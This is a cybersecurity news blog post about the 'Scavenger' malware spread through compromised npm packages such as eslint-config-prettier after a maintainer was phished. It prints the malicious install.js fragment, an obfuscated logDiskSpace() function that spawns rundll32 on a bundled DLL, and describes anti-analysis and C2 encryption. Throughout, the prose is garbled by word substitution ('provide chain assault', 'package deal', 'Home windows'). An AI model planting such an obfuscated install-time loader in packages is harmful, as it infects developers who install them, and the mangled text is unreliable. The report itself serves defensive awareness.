Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Scavenger Malware Hijacks Popular npm Packages to Attack Developers

Posted on July 23, 2025July 23, 2025 By CWS

A complicated provide chain assault concentrating on JavaScript builders emerged on Friday, July 18th, 2025, when cybercriminals compromised a number of common npm packages to distribute the newly recognized “Scavenger” malware.

The assault primarily centered on eslint-config-prettier, a widely-used code formatting package deal, together with a number of different growth instruments together with eslint-plugin-prettier, snyckit, @pkgr/core, and napi-postinstall.

The compromise was found when GitHub customers reported suspicious releases of eslint-config-prettier that appeared within the npm registry regardless of no corresponding code adjustments being mirrored within the venture’s GitHub repository.

Phishing E mail Acquired by NPM Package deal Maintainer (Supply – Humpty’s RE Weblog)

The package deal maintainer later confirmed their npm account had been compromised by means of a phishing e-mail marketing campaign, permitting attackers to publish malicious variations throughout a number of package deal variations together with 8.10.1, 9.1.1, 10.1.6, and 10.1.7.

Humpty’s RE weblog recognized the malware household as “Scavenger” as a result of a number of references to the strings “SCVNGR” and “Scavenger” discovered all through the malware variants.

The assault represents a big escalation in provide chain threats, because it particularly targets the developer ecosystem by means of trusted growth instruments which are routinely put in in JavaScript initiatives worldwide.

The malware’s impression extends past typical info stealing, because it particularly targets Chromium-based browsers and their related information shops, together with Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Hyperlinks.

This concentrating on suggests the attackers are notably eager about harvesting developer credentials, session tokens, and looking patterns from software program growth professionals who generally use these instruments.

An infection Mechanism and Code Execution

The Scavenger malware employs a classy an infection vector by means of the compromised eslint-config-prettier package deal.

Upon set up, the malicious package deal executes an set up.js file containing a deceptively named logDiskSpace() operate that serves because the preliminary payload supply mechanism.

String decryption routine (Supply – Humpty’s RE Weblog)

The operate contains intentionally obfuscated JavaScript code that checks for Home windows techniques earlier than executing the malicious payload:-

operate logDiskSpace() {
strive {
if(os.platform() == ‘win32’) {
const tempDir = os.tmpdir();
require(‘chi’+’ld_pro’+’cess’)[“sp”+”awn”]
(“rund”+”ll32”,
[path.join(__dirname, ‘./node-gyp’ + ‘.dll’) +
“,main”]);

This code fragment demonstrates the attackers’ use of string concatenation to evade static evaluation instruments whereas executing a bundled DLL file named node-gyp.dll utilizing Home windows’ rundll32.exe utility.

The malware loader, compiled on the identical day because the assault (2025-07-18 08:59:38 UTC), incorporates a number of anti-analysis strategies together with VM detection by means of SMBIOS firmware desk enumeration and course of house scanning for safety instruments like Avast, Sandboxie, and Comodo Antivirus.

The malware makes use of XXTEA block cipher encryption with a particular DELTA worth of 0x9e3779b9 for command and management communications, establishing preliminary contact by means of base64-encoded responses from compromised infrastructure.

Increase detection, cut back alert fatigue, speed up response; all with an interactive sandbox constructed for safety groups -> Attempt ANY.RUN Now

Cyber Security News Tags:Attack, Developers, Hijacks, Malware, NPM, Packages, Popular, Scavenger

Post navigation

Previous Post: How to Recognize Deepfake Videos
Next Post: Researchers Unmasked Russia’s Most Secretive FSB’s Spy Network

Related Posts

Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code Cyber Security News
AI Tools Like GPT Direct Users to Phishing Sites Instead of Legitimate Ones Cyber Security News
Writable File in Lenovo’s Windows Directory Enables a Stealthy AppLocker Bypass Cyber Security News
FileFix Attack Exploits Windows Browser Features to Bypass Mark-of-the-Web Protection Cyber Security News
Real-Time Threat Intelligence for Proactive Cyber Defense in 2025 Cyber Security News
VMware NSX XSS Vulnerability Allows Attackers to Inject Malicious Code Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • France Says Administrator of Cybercrime Forum XSS Arrested in Ukraine
  • Ransomware Gangs Leveraging RMM Tools to Attack Organizations and Exfiltrate Data
  • Clorox Sues IT Provider Cognizant For Simply Giving Employee Password to Hackers
  • Organizations Warned of Interlock Ransomware Attacks
  • A New Approach to a Decade-Old Challenge

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • France Says Administrator of Cybercrime Forum XSS Arrested in Ukraine
  • Ransomware Gangs Leveraging RMM Tools to Attack Organizations and Exfiltrate Data
  • Clorox Sues IT Provider Cognizant For Simply Giving Employee Password to Hackers
  • Organizations Warned of Interlock Ransomware Attacks
  • A New Approach to a Decade-Old Challenge

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News